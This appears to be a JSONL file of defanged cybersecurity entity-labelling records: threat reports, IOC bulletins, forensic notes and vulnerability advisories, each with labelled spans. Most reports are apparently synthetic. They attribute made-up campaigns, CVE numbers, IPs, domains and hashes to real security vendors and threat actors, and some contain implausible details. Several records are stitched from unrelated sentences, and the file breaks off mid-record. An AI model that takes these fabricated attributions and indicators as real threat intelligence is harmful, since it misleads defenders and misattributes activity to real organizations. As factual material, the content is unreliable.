https://github.com/orchest/orchest": [[776, 814]], "Indicator: orchest.io": [[834, 846]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-39268"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Rubeus artifacts at /opt/app/bin/winlogon.exe. Memory dump analysis confirmed execution of BITSAdmin. Registry modifications pointed to persistence via /home/user/.config/dropper.ps1. Network forensics identified connections to 192[.]72[.]32[.]219 and portalupdate[ . ]info. Email headers traced the initial vector to helpdesk@credential-check[.]site. File C:\\Users\\admin\\Downloads\\shell.php (SHA1: 5e2b78f682cab0d52d50c7e8c8fdbe2177990631) was identified as the initial dropper. A staging URL hxxps://proxy-edge[ . ]dev/admin/config resolved to 121 [ . ] 130 [ . ] 143 [ . ] 115. Secondary artifact hash: MD5: 248b6f59e35839343c2a2dd073fe69ee.", "spans": {"Indicator: 192.72.32.219": [[300, 319]], "Indicator: portalupdate.info": [[324, 345]], "Indicator: helpdesk@credential-check.site": [[390, 422]], "Indicator: 5e2b78f682cab0d52d50c7e8c8fdbe2177990631": [[471, 511]], "Indicator: https://proxy-edge.dev/admin/config": [[566, 605]], "Indicator: 121.130.143.115": [[618, 651]], "Indicator: 248b6f59e35839343c2a2dd073fe69ee": [[683, 715]]}, "info": {"id": "synth_v2_01280", "source": "defanged_augment"}}
{"text": "A backdoor also known as: VB:Trojan.VBA.Downloader.R VB:Trojan.VBA.Downloader.R VBA[.]Trojan[.]Obfuscated[.]at VBA/Obfuscated.P Doc.Macro.Obfuscation-6360615-0 VB:Trojan.VBA.Downloader.R VB:Trojan.VBA.Downloader.R Trojan.Script.MLW.ehjqnz VB:Trojan.VBA.Downloader.R VB:Trojan.VBA.Downloader.R W97M/Downloader.bkw HEUR.VBA.Trojan.e TrojanDownloader:O97M/Shelmock.A!dha W97M/Downloader.bkw Trojan.VBA.Obfuscated heur.macro.powershell.x", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: VBA.Trojan.Obfuscated.at": [[80, 110]]}, "info": {"id": "cyner2_train_003455", "source": "defanged_augment"}}
{"text": "IOC Bulletin - BlackCat Campaign:\nNetwork Indicators:\n- 172 [ . ] 214 [ . ] 65 [ . ] 81\n- 127[.]24[.]16[.]145\n- 133[.]26[.]156[.]4\n- backup-portal[ . ]net\n- staticrelay[ . ]link\nURLs:\n- hxxps://update-api[.]dev/login\n- hxxps://cloudnode[ . ]io/portal/verify\nEmail Senders:\n- service@credential-check[ . ]site\n- helpdesk@mail-service[.]info\nFile Indicators:\n- SHA1: 3154292e94d84d66d2ac9363f8ad862292f78b17\n- SHA256: c651925518198642a56e46608a9e6a8c6884c5b4d81c8f30f9989019bb06c65a\n- Drop path: /dev/shm/agent.py", "spans": {"Malware: BlackCat": [[15, 23]], "Indicator: 172.214.65.81": [[56, 87]], "Indicator: 127.24.16.145": [[90, 109]], "Indicator: 133.26.156.4": [[112, 130]], "Indicator: backup-portal.net": [[133, 154]], "Indicator: staticrelay.link": [[157, 177]], "Indicator: hxxps://update-api.dev/login": [[186, 216]], "Indicator: https://cloudnode.io/portal/verify": [[219, 257]], "Indicator: service@credential-check.site": [[275, 308]], "Indicator: helpdesk@mail-service.info": [[311, 339]], "Indicator: 3154292e94d84d66d2ac9363f8ad862292f78b17": [[365, 405]], "Indicator: c651925518198642a56e46608a9e6a8c6884c5b4d81c8f30f9989019bb06c65a": [[416, 480]]}, "info": {"id": "synth_v2_01473", "source": "defanged_augment"}}
{"text": "FireEye published a threat intelligence report linking UNC2452 to a new campaign exploiting CVE-2024-14337 in F5 BIG-IP. The attackers deployed WarmCookie via Burp Suite, establishing C2 communication with 10 [ . ] 226 [ . ] 157 [ . ] 94 and node-login[.]tech. A secondary payload was downloaded from hxxp://proxyedge[ . ]com/gate.php. The malware binary (MD5: 478c274e5643a15a0a4a5b0338f93f89) was dropped to C:\\Windows\\Temp\\ntds.dit. Phishing emails were sent from finance@document-share[ . ]link targeting enterprise users. A backup C2 server was identified at 67 [ . ] 79 [ . ] 155 [ . ] 3.", "spans": {"Organization: FireEye": [[0, 7]], "Vulnerability: CVE-2024-14337": [[92, 106]], "System: F5 BIG-IP": [[110, 119]], "Malware: WarmCookie": [[144, 154]], "Indicator: 10.226.157.94": [[206, 237]], "Indicator: node-login.tech": [[242, 259]], "Indicator: http://proxyedge.com/gate.php": [[301, 334]], "Indicator: 478c274e5643a15a0a4a5b0338f93f89": [[361, 393]], "Indicator: finance@document-share.link": [[467, 498]], "Indicator: 67.79.155.3": [[564, 593]]}, "info": {"id": "synth_v2_00174", "source": "defanged_augment"}}
{"text": "### Impact It's possible to know if a user has or not an account in a wiki related to an email address, and which username(s) is actually tied to that email by forging a request to the Forgot username page. Note that since this page does not have a CSRF check it's quite easy to perform a lot of those requests. ### Patches This issue has been patched in XWiki 12.10.5 and 13.2RC1. Two different patches are provided: - a first one to fix the CSRF problem - a more complex one that now relies on sending an email for the Forgot username process. ### Workarounds It's possible to fix the problem without uprading by editing the ForgotUsername page in version below 13.x, to use the following code: hxxps://github[.]com/xwiki/xwiki-platform/blob/69548c0320cbd772540cf4668743e69f879812cf/xwiki-platform-core/xwiki-platform-administration/xwiki-platform-administration-ui/src/main/resources/XWiki/ForgotUsername.xml#L39-L123 In version after 13.x it's also possible to edit manually the forgotusername.vm file, but it's really encouraged to upgrade the version here. ### References * hxxps://jira[ . ]xwiki[ . ]org/browse/XWIKI-18384 * hxxps://jira[.]xwiki[.]org/browse/XWIKI-18408 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki](hxxps://jira[.]xwiki[.]org) * Email us at [security ML](mailto:security@xwiki[ . ]org)", "spans": {"Indicator: https://github.com/xwiki/xwiki-platform/blob/69548c0320cbd772540cf4668743e69f879812cf/xwiki-platform-core/xwiki-platform-administration/xwiki-platform-administration-ui/src/main/resources/XWiki/ForgotUsername.xml#L39-L123": [[697, 920]], "Indicator: https://jira.xwiki.org/browse/XWIKI-18384": [[1080, 1129]], "Indicator: https://jira.xwiki.org/browse/XWIKI-18408": [[1132, 1177]], "Indicator: https://jira.xwiki.org": [[1294, 1320]], "Indicator: xwiki.org": [[1366, 1379]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-32732"}}
{"text": "Blog Post by Mandiant: Tracking Granite Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2023-14679 against Microsoft Exchange deployments. The initial access vector involves spear-phishing emails from finance@auth-check[.]org delivering Ryuk. Post-compromise, the attackers deploy Vidar and use Merlin for reconnaissance. C2 infrastructure includes 192[.]126[.]68[.]155 and relaysync[.]info. A staging server at hxxp://datadata[ . ]link/collect hosts additional tooling. Key artifact: C:\\Windows\\Tasks\\loader.exe (SHA1: f69f98fb65d36fd0522ccb3423b014eadd93443f).", "spans": {"Organization: Mandiant": [[13, 21]], "Vulnerability: CVE-2023-14679": [[127, 141]], "System: Microsoft Exchange": [[150, 168]], "Indicator: finance@auth-check.org": [[244, 268]], "Malware: Ryuk": [[280, 284]], "Malware: Vidar": [[324, 329]], "Indicator: 192.126.68.155": [[392, 412]], "Indicator: relaysync.info": [[417, 433]], "Indicator: hxxp://datadata.link/collect": [[455, 487]], "Indicator: f69f98fb65d36fd0522ccb3423b014eadd93443f": [[563, 603]]}, "info": {"id": "synth_v2_01674", "source": "defanged_augment"}}
{"text": "Artifact Analysis for Raccoon Stealer campaign:\nStage 1 dropper at C:\\ProgramData\\taskhost.exe - SHA1: ca7ec44d095c278af6a7e0b7477646b11e9615c1\nStage 2 loader at C:\\Program Files\\Common Files\\update.dll - SHA1: 31fbfbb95f62a932f33026643c437dfd749707c8\nFinal payload at C:\\Users\\Public\\Documents\\csrss.exe - MD5: 38ff55b0a92b142e09a2625a1e16ec2b\nExfiltration module - SHA256: 3e40493656bbbde19c267eae64df54a2c754c835945f7ac23d224bb1c7f163c7\nAll stages communicated with 61[.]189[.]94[.]238. Havoc signatures detected in Stage 2.", "spans": {"Malware: Raccoon Stealer": [[22, 37]], "Indicator: ca7ec44d095c278af6a7e0b7477646b11e9615c1": [[103, 143]], "Indicator: 31fbfbb95f62a932f33026643c437dfd749707c8": [[211, 251]], "Indicator: 38ff55b0a92b142e09a2625a1e16ec2b": [[312, 344]], "Indicator: 3e40493656bbbde19c267eae64df54a2c754c835945f7ac23d224bb1c7f163c7": [[375, 439]], "Indicator: 61.189.94.238": [[469, 488]]}, "info": {"id": "synth_v2_01951", "source": "defanged_augment"}}
{"text": "This addition is seen in Figure 5 . About four months after The New York Times publicized an attack on its network , the APT12 behind the intrusion deployed updated versions of their Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe malware families . The controller will respond with one of two responses: 99 [ . ] 250 [ . ] 250 [ . ] 199 will set the receive mode to . Another new actor we discovered , seemingly of Vietnamese origin , uses a Yashma ransomware variant to target victims in Bulgaria , China , Vietnam and other countries .", "spans": {"Organization: The New York Times": [[60, 78]], "Indicator: 99.250.250.199": [[301, 333]], "Organization: Bulgaria": [[486, 494]], "Organization: China": [[497, 502]], "Organization: Vietnam": [[505, 512]]}, "info": {"id": "cyberner_stix_train_002047", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 192[.]82[.]174[.]115, the Microsoft MSRC IR team identified Play running as C:\\Windows\\System32\\shell.php. The threat actor, believed to be Silk Typhoon, used SharpHound for credential harvesting and GhostPack for lateral movement. Exfiltrated data was sent to cdnportal[.]xyz and static-static[ . ]net. The initial dropper (SHA256: 97260feeb3c713d65f0787c7ace21b46423d5132f4325c0999a9968e2a4f9f2c) was delivered via a phishing email from finance@urgent-notice[ . ]online. A second C2 node was observed at 172 [ . ] 148 [ . ] 184 [ . ] 160, with a persistence mechanism writing to /dev/shm/taskhost.exe.", "spans": {"Indicator: 192.82.174.115": [[64, 84]], "Organization: Microsoft MSRC": [[90, 104]], "Malware: Play": [[124, 128]], "Indicator: cdnportal.xyz": [[325, 340]], "Indicator: static-static.net": [[345, 366]], "Indicator: 97260feeb3c713d65f0787c7ace21b46423d5132f4325c0999a9968e2a4f9f2c": [[397, 461]], "Indicator: finance@urgent-notice.online": [[503, 535]], "Indicator: 172.148.184.160": [[570, 603]]}, "info": {"id": "synth_v2_00370", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Proofpoint identified a large-scale phishing operation. Emails originated from service@phishing-domain[ . ]com and verify@account-update[.]xyz, spoofing legitimate services. Victims were directed to hxxp://auth-sync[.]io/gate.php which hosted a credential harvesting page on auth-login[.]net. A secondary link hxxps://edge-login[.]site/collect delivered Gootloader (SHA256: 903cc5c2686e430681a8ddd1a0a178423db0bd5c00c5358e603e45e389f42927). The malware was saved to /home/user/.config/sam.hive and established C2 with 48[.]165[.]142[.]215.", "spans": {"Organization: Proofpoint": [[26, 36]], "Indicator: service@phishing-domain.com": [[105, 136]], "Indicator: verify@account-update.xyz": [[141, 168]], "Indicator: http://auth-sync.io/gate.php": [[225, 255]], "Indicator: auth-login.net": [[301, 317]], "Indicator: https://edge-login.site/collect": [[336, 369]], "Malware: Gootloader": [[380, 390]], "Indicator: 903cc5c2686e430681a8ddd1a0a178423db0bd5c00c5358e603e45e389f42927": [[400, 464]], "Indicator: 48.165.142.215": [[544, 564]]}, "info": {"id": "synth_v2_01047", "source": "defanged_augment"}}
{"text": "Throughout the final quarter of 2016 and first month of 2017 , FireEye Dynamic Threat Intelligence (DTI) observed consistent Magnitude EK hits from several customers , the majority of whom reside in the APAC region . Per the complaint , the email account watsonhenny@gmail[ . ]com was used to send LinkedIn invitations to employees of a bank later targeted by APT38 .", "spans": {"Organization: FireEye": [[63, 70]], "Indicator: watsonhenny@gmail.com": [[255, 280]], "Organization: employees": [[322, 331]]}, "info": {"id": "cyberner_stix_train_002450", "source": "defanged_augment"}}
{"text": "IOC Bulletin - Vidar Campaign:\nNetwork Indicators:\n- 139 [ . ] 180 [ . ] 225 [ . ] 146\n- 131[.]207[.]99[.]162\n- 10[.]130[.]28[.]115\n- backup-backup[ . ]io\n- data-edge[.]top\nURLs:\n- hxxps://auth-auth[.]link/secure/token\n- hxxp://proxyportal[ . ]online/callback\nEmail Senders:\n- info@document-share[ . ]link\n- ceo@account-update[.]xyz\nFile Indicators:\n- SHA1: 9ac06ce6d73407ad1bf6bc321fe5998e13a076ac\n- SHA256: e667d610d13e603d571e1bdb31395c30fbd308a95dce909716b1f31555881036\n- Drop path: /usr/local/bin/shell.php", "spans": {"Malware: Vidar": [[15, 20]], "Indicator: 139.180.225.146": [[53, 86]], "Indicator: 131.207.99.162": [[89, 109]], "Indicator: 10.130.28.115": [[112, 131]], "Indicator: backup-backup.io": [[134, 154]], "Indicator: data-edge.top": [[157, 172]], "Indicator: https://auth-auth.link/secure/token": [[181, 218]], "Indicator: http://proxyportal.online/callback": [[221, 259]], "Indicator: info@document-share.link": [[277, 305]], "Indicator: ceo@account-update.xyz": [[308, 332]], "Indicator: 9ac06ce6d73407ad1bf6bc321fe5998e13a076ac": [[358, 398]], "Indicator: e667d610d13e603d571e1bdb31395c30fbd308a95dce909716b1f31555881036": [[409, 473]]}, "info": {"id": "synth_v2_01442", "source": "defanged_augment"}}
{"text": "SentinelOne published a threat intelligence report linking Forest Blizzard to a new campaign exploiting CVE-2021-20463 in Apache Struts. The attackers deployed Latrodectus via Covenant, establishing C2 communication with 10[.]221[.]201[.]161 and edgecloud[ . ]top. A secondary payload was downloaded from hxxp://proxy-login[.]xyz/secure/token. The malware binary (MD5: 18d0f61c949507c7592eba9db7da3e11) was dropped to C:\\Windows\\System32\\agent.py. Phishing emails were sent from noreply@account-update[ . ]xyz targeting enterprise users. A backup C2 server was identified at 183[.]195[.]207[.]98.", "spans": {"Organization: SentinelOne": [[0, 11]], "Vulnerability: CVE-2021-20463": [[104, 118]], "System: Apache Struts": [[122, 135]], "Malware: Latrodectus": [[160, 171]], "Indicator: 10.221.201.161": [[221, 241]], "Indicator: edgecloud.top": [[246, 263]], "Indicator: http://proxy-login.xyz/secure/token": [[305, 342]], "Indicator: 18d0f61c949507c7592eba9db7da3e11": [[369, 401]], "Indicator: noreply@account-update.xyz": [[479, 509]], "Indicator: 183.195.207.98": [[575, 595]]}, "info": {"id": "synth_v2_00211", "source": "defanged_augment"}}
{"text": "On September 10 , 2019 , we observed an HTTP POST request to the following URL that we believe was the exploitation of CVE-2019-0604 in a publicly facing SharePoint server ( T1190 ) : /_layouts/15/picker[ . ]aspx .", "spans": {"Vulnerability: CVE-2019-0604": [[119, 132]], "Indicator: /_layouts/15/picker.aspx": [[184, 212]]}, "info": {"id": "cyberner_stix_train_000542", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Proofpoint identified a large-scale phishing operation. Emails originated from alert@account-update[.]xyz and security@account-update[.]xyz, spoofing legitimate services. Victims were directed to hxxp://portalsync[ . ]xyz/panel/index.html which hosted a credential harvesting page on login-auth[ . ]site. A secondary link hxxps://securesecure[ . ]com/portal/verify delivered DarkSide (SHA1: d649b48289f9a688ba84181428b87cb603e348ac). The malware was saved to /opt/app/bin/backdoor.elf and established C2 with 218 [ . ] 98 [ . ] 99 [ . ] 190.", "spans": {"Organization: Proofpoint": [[26, 36]], "Indicator: alert@account-update.xyz": [[105, 131]], "Indicator: security@account-update.xyz": [[136, 165]], "Indicator: hxxp://portalsync.xyz/panel/index.html": [[222, 264]], "Indicator: login-auth.site": [[310, 329]], "Indicator: https://securesecure.com/portal/verify": [[348, 390]], "Malware: DarkSide": [[401, 409]], "Indicator: d649b48289f9a688ba84181428b87cb603e348ac": [[417, 457]], "Indicator: 218.98.99.190": [[535, 566]]}, "info": {"id": "synth_v2_00862", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: fix recursive locking in RPC handle list access\n\nSince commit 305853cce3794 (\"ksmbd: Fix race condition in RPC handle list\naccess\"), ksmbd_session_rpc_method() attempts to lock sess->rpc_lock.\n\nThis causes hung connections / tasks when a client attempts to open\na named pipe. Using Samba's rpcclient tool:\n\n $ rpcclient //192[.]168[.]1[.]254 -U user%password\n $ rpcclient $> srvinfo\n <connection hung here>\n\nKernel side:\n  \"echo 0 > /proc/sys/kernel/hung_task_timeout_secs\" disables this message.\n  task:kworker/0:0 state:D stack:0 pid:5021 tgid:5021 ppid:2 flags:0x00200000\n  Workqueue: ksmbd-io handle_ksmbd_work\n  Call trace:\n  __schedule from schedule+0x3c/0x58\n  schedule from schedule_preempt_disabled+0xc/0x10\n  schedule_preempt_disabled from rwsem_down_read_slowpath+0x1b0/0x1d8\n  rwsem_down_read_slowpath from down_read+0x28/0x30\n  down_read from ksmbd_session_rpc_method+0x18/0x3c\n  ksmbd_session_rpc_method from ksmbd_rpc_open+0x34/0x68\n  ksmbd_rpc_open from ksmbd_session_rpc_open+0x194/0x228\n  ksmbd_session_rpc_open from create_smb2_pipe+0x8c/0x2c8\n  create_smb2_pipe from smb2_open+0x10c/0x27ac\n  smb2_open from handle_ksmbd_work+0x238/0x3dc\n  handle_ksmbd_work from process_scheduled_works+0x160/0x25c\n  process_scheduled_works from worker_thread+0x16c/0x1e8\n  worker_thread from kthread+0xa8/0xb8\n  kthread from ret_from_fork+0x14/0x38\n  Exception stack(0x8529ffb0 to 0x8529fff8)\n\nThe task deadlocks because the lock is already held:\n  ksmbd_session_rpc_open\n    down_write(&sess->rpc_lock)\n    ksmbd_rpc_open\n      ksmbd_session_rpc_method\n        down_read(&sess->rpc_lock)   <-- deadlock\n\nAdjust ksmbd_session_rpc_method() callers to take the lock when necessary.", "spans": {"Indicator: 192.168.1.254": [[398, 417]], "System: Linux kernel": [[7, 19]], "System: Samba": [[358, 363]], "Vulnerability: race condition": [[165, 179]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-40090"}}
{"text": "The server can use this information to determine if the user ’ s carrier is one of Bread ’ s targets . We identified an overlap in the domain voguextra[ . ]com , which was used by Bahamut within their \" Devoted To Humanity \" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post . The last type of Kernel modification that ZxShell rootkit performs is the system call dispatcher ( KiFastCallEntry ) hook . Talos researchers recently discovered multiple vulnerabilities in Open Babel , an open - source software library used in a variety of chemistry and research settings .", "spans": {"Malware: Bread": [[83, 88]], "Malware: Devoted To Humanity": [[203, 222]], "Malware: ZxShell": [[364, 371]], "Organization: Talos researchers": [[446, 463]], "Indicator: voguextra.com": [[142, 159]]}, "info": {"id": "cyberner_stix_train_003586", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Lumma Stealer (SHA1: 13d9cdb3c3670447ac0adad94ca51470a0f2cc51). Upon execution on Palo Alto PAN-OS, the sample creates /usr/local/bin/chrome_helper.exe and injects into legitimate processes. Network analysis shows beaconing to 172[.]240[.]9[.]81 every 60 seconds and DNS queries to portal-login[.]cc. The second stage was fetched from hxxp://apinode[ . ]online/collect and written to C:\\Windows\\Tasks\\lsass.dmp. The payload uses Seatbelt-style techniques for defense evasion. A secondary hash (SHA256: 144dd456de640cccfbd601e4daac55f64794a1d9d8370cc840e6135e724ec1ad) was extracted from the unpacked payload.", "spans": {"Malware: Lumma Stealer": [[25, 38]], "Indicator: 13d9cdb3c3670447ac0adad94ca51470a0f2cc51": [[46, 86]], "System: Palo Alto PAN-OS": [[107, 123]], "Indicator: 172.240.9.81": [[252, 270]], "Indicator: portal-login.cc": [[307, 324]], "Indicator: http://apinode.online/collect": [[360, 393]], "Indicator: 144dd456de640cccfbd601e4daac55f64794a1d9d8370cc840e6135e724ec1ad": [[527, 591]]}, "info": {"id": "synth_v2_00556", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Mimikatz artifacts at /opt/app/bin/implant.so. Memory dump analysis confirmed execution of Impacket. Registry modifications pointed to persistence via /var/tmp/backdoor.elf. Network forensics identified connections to 191[.]74[.]48[.]21 and authnode[.]xyz. Email headers traced the initial vector to confirm@secure-verify[.]net. File C:\\ProgramData\\update.dll (MD5: a51ce9d7bfc3d1a998e514ed328dea07) was identified as the initial dropper. A staging URL hxxps://cacheportal[.]top/gate.php resolved to 44 [ . ] 65 [ . ] 80 [ . ] 72. Secondary artifact hash: SHA256: 74255276c5eeb7477976357672b8b3c4ac77008e32f6d624d0521836445f1d2d.", "spans": {"Indicator: 191.74.48.21": [[290, 308]], "Indicator: authnode.xyz": [[313, 327]], "Indicator: confirm@secure-verify.net": [[372, 399]], "Indicator: a51ce9d7bfc3d1a998e514ed328dea07": [[438, 470]], "Indicator: hxxps://cacheportal.top/gate.php": [[525, 559]], "Indicator: 44.65.80.72": [[572, 601]], "Indicator: 74255276c5eeb7477976357672b8b3c4ac77008e32f6d624d0521836445f1d2d": [[636, 700]]}, "info": {"id": "synth_v2_01126", "source": "defanged_augment"}}
{"text": "X-Force IRIS researchers further identified that the threat actor behind the malicious documents served many of them using a URL-shortening scheme in the following pattern : briefl[ . ]ink/{a-z0-9}[5] .", "spans": {"Organization: X-Force IRIS": [[0, 12]], "Indicator: briefl.ink/{a-z0-9}[5]": [[174, 200]]}, "info": {"id": "cyberner_stix_train_000108", "source": "defanged_augment"}}
{"text": "Artifact Analysis for RedLine Stealer campaign:\nStage 1 dropper at C:\\Windows\\Temp\\beacon.dll - MD5: 6ec35a241998edbf93b4f18a72c51d17\nStage 2 loader at C:\\Users\\Public\\Documents\\payload.bin - MD5: a24bb5e83fc2c43a1adf388aae6a78f9\nFinal payload at C:\\ProgramData\\config.dat - SHA1: 9103179775827a21f6140add595dda10102f025e\nExfiltration module - SHA256: 0233acfd7efef6e7a997c9a15a4f8eac56edd66f6e11a6ed23361b23e090d4fe\nAll stages communicated with 154 [ . ] 39 [ . ] 25 [ . ] 38. PowerShell Empire signatures detected in Stage 2.", "spans": {"Malware: RedLine Stealer": [[22, 37]], "Indicator: 6ec35a241998edbf93b4f18a72c51d17": [[101, 133]], "Indicator: a24bb5e83fc2c43a1adf388aae6a78f9": [[197, 229]], "Indicator: 9103179775827a21f6140add595dda10102f025e": [[281, 321]], "Indicator: 0233acfd7efef6e7a997c9a15a4f8eac56edd66f6e11a6ed23361b23e090d4fe": [[352, 416]], "Indicator: 154.39.25.38": [[446, 476]]}, "info": {"id": "synth_v2_01938", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: SentinelOne identified a large-scale phishing operation. Emails originated from admin@auth-check[.]org and security@secure-verify[ . ]net, spoofing legitimate services. Victims were directed to hxxp://secure-portal[.]org/login which hosted a credential harvesting page on sync-edge[.]live. A secondary link hxxps://portalbackup[.]io/login delivered SmokeLoader (SHA1: 3b4cb32a398300a5a06cd313ad99a8a29a43e65a). The malware was saved to C:\\Users\\Public\\Documents\\helper.sh and established C2 with 192 [ . ] 97 [ . ] 21 [ . ] 85.", "spans": {"Organization: SentinelOne": [[26, 37]], "Indicator: admin@auth-check.org": [[106, 128]], "Indicator: security@secure-verify.net": [[133, 163]], "Indicator: http://secure-portal.org/login": [[220, 252]], "Indicator: sync-edge.live": [[298, 314]], "Indicator: hxxps://portalbackup.io/login": [[333, 364]], "Malware: SmokeLoader": [[375, 386]], "Indicator: 3b4cb32a398300a5a06cd313ad99a8a29a43e65a": [[394, 434]], "Indicator: 192.97.21.85": [[522, 552]]}, "info": {"id": "synth_v2_00878", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 17 [ . ] 197 [ . ] 96 [ . ] 122, the Cisco Talos IR team identified DanaBot running as C:\\Users\\admin\\Downloads\\runtime.dll. The threat actor, believed to be Salt Typhoon, used Ligolo for credential harvesting and SharpHound for lateral movement. Exfiltrated data was sent to auth-edge[ . ]org and static-proxy[.]com. The initial dropper (MD5: 30d739b0d350f64911bc0657d0bce8d0) was delivered via a phishing email from helpdesk@mail-service[.]info. A second C2 node was observed at 172[.]231[.]155[.]24, with a persistence mechanism writing to C:\\ProgramData\\lsass.dmp.", "spans": {"Indicator: 17.197.96.122": [[64, 95]], "Organization: Cisco Talos": [[101, 112]], "Malware: DanaBot": [[132, 139]], "Indicator: auth-edge.org": [[340, 357]], "Indicator: static-proxy.com": [[362, 380]], "Indicator: 30d739b0d350f64911bc0657d0bce8d0": [[408, 440]], "Indicator: helpdesk@mail-service.info": [[482, 510]], "Indicator: 172.231.155.24": [[545, 565]]}, "info": {"id": "synth_v2_00310", "source": "defanged_augment"}}
{"text": "The second function is http : //s.psserviceonline [ . BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab[ . ]exe , probably for compressing stolen data to be uploaded .", "spans": {"Vulnerability: zero-day vulnerability": [[123, 145]], "Malware: Powermud backdoor": [[334, 351]], "Malware: Backdoor.Powemuddy": [[371, 389]], "Malware: custom tools": [[398, 410]], "System: Windows": [[511, 518]], "Indicator: makecab.exe": [[543, 558]]}, "info": {"id": "cyberner_stix_train_001203", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan.NSIS.Androm.7 Ransom[.]Onion.A Win32.Trojan.WisdomEyes.16070401.9500.9984 Packed.NSISPacker!g6 Ransom_.97182692 Trojan.NSIS.Androm.7 Trojan.Win32.Graftor.evkohe Trojan:W32/Gamarue.E Trojan.Inject2.64079 Ransom_.97182692 BehavesLike[.]Win32[.]Ransom[.]cc Trojan.Win32.Injector W32/Trojan.HJUO-7930 Trojan.Graftor.D6B214 Ransom.Cerber/Variant Ransom:Win32/Malasypt.A Trojan/Win32.Miuref.R183155 Trj/CI.A Trojan.Injector!s1rN7kKLdpI W32/Injector.DDGJ!tr Win32/Trojan.5c1", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Ransom.Onion": [[47, 61]], "Indicator: BehavesLike.Win32.Ransom.cc": [[253, 286]]}, "info": {"id": "cyner2_train_006529", "source": "defanged_augment"}}
{"text": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of CentOS Web Panel cwp-e17.0 [ . ] 9 [ . ] 8 [ . ] 923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_list_accounts.php. When parsing the username parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose information in the context of root. Was ZDI-CAN-9717.", "spans": {"Indicator: 0.9.8.923": [[131, 158]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-15618"}}
{"text": "Malware Analysis Report: Conti (SHA1: 63ca8e9737f0f4f81dda226ca748b526d6de1c1f). Upon execution on Progress Telerik, the sample creates C:\\Windows\\Tasks\\dropper.ps1 and injects into legitimate processes. Network analysis shows beaconing to 164[.]126[.]105[.]154 every 60 seconds and DNS queries to secureproxy[.]tech. The second stage was fetched from hxxps://portal-proxy[ . ]club/collect and written to /opt/app/bin/payload.bin. The payload uses Nmap-style techniques for defense evasion. A secondary hash (SHA1: f9765294dfbb0412874a862b43fa68ba0ccfb146) was extracted from the unpacked payload.", "spans": {"Malware: Conti": [[25, 30]], "Indicator: 63ca8e9737f0f4f81dda226ca748b526d6de1c1f": [[38, 78]], "System: Progress Telerik": [[99, 115]], "Indicator: 164.126.105.154": [[240, 261]], "Indicator: secureproxy.tech": [[298, 316]], "Indicator: https://portal-proxy.club/collect": [[352, 389]], "Indicator: f9765294dfbb0412874a862b43fa68ba0ccfb146": [[515, 555]]}, "info": {"id": "synth_v2_00588", "source": "defanged_augment"}}
{"text": "A backdoor also known as: W32.BackdoorSlingup.Trojan Trojan/W32.Fsysna.77824.F Heur.Win32.VBKrypt.3!O Backdoor.Slingup.MF.150 Win32.Worm.VB.rt W32/Trojan.XMLD-4299 W32.Difobot BKDR_GORYNYCH.SM Trojan.Win32.Fsysna.ccit Trojan.Win32.Fsysna.dwujaf Troj.W32.Fsysna.tnPd Trojan.DownLoader14.15241 Trojan.Fsysna.Win32.7242 BKDR_GORYNYCH.SM BehavesLike[ . ]Win32[ . ]Backdoor[ . ]lt Worm.Win32.VB W32/Trojan3.TRB Trojan/Fsysna.dgo Trojan/Win32.Fsysna Trojan.Win32.Fsysna.ccit Trojan/Win32.VBInject.R158763 Trojan.Fsysna Trojan.Reconyc Win32/VB.OOB Win32.Trojan.Fsysna.Phgj", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Backdoor.lt": [[334, 375]]}, "info": {"id": "cyner2_train_000069", "source": "defanged_augment"}}
{"text": "] today shop [ . The name Mofang is based on the Mandarin verb , which means to imitate . Backdoor[.]APT[.]Aumlib : In subsequent investigations , we observed malicious files created by w3wp.exe , the process responsible for the Exchange Server web front - end .", "spans": {"Indicator: Backdoor.APT.Aumlib": [[90, 113]]}, "info": {"id": "cyberner_stix_train_005296", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Havoc artifacts at /home/user/.config/winlogon.exe. Memory dump analysis confirmed execution of Merlin. Registry modifications pointed to persistence via C:\\Users\\admin\\AppData\\Local\\Temp\\winlogon.exe. Network forensics identified connections to 113 [ . ] 116 [ . ] 51 [ . ] 243 and backup-node[ . ]tech. Email headers traced the initial vector to info@mail-service[ . ]info. File C:\\Windows\\System32\\payload.bin (SHA1: a8e8efc33eb8468d23ed3d20b890f128c179e8ed) was identified as the initial dropper. A staging URL hxxp://cdn-login[ . ]tech/callback resolved to 10[.]143[.]117[.]212. Secondary artifact hash: SHA1: 663254acc13c6c7e14596ef3875b4dd07c6d16d7.", "spans": {"Indicator: 113.116.51.243": [[318, 350]], "Indicator: backup-node.tech": [[355, 375]], "Indicator: info@mail-service.info": [[420, 446]], "Indicator: a8e8efc33eb8468d23ed3d20b890f128c179e8ed": [[492, 532]], "Indicator: 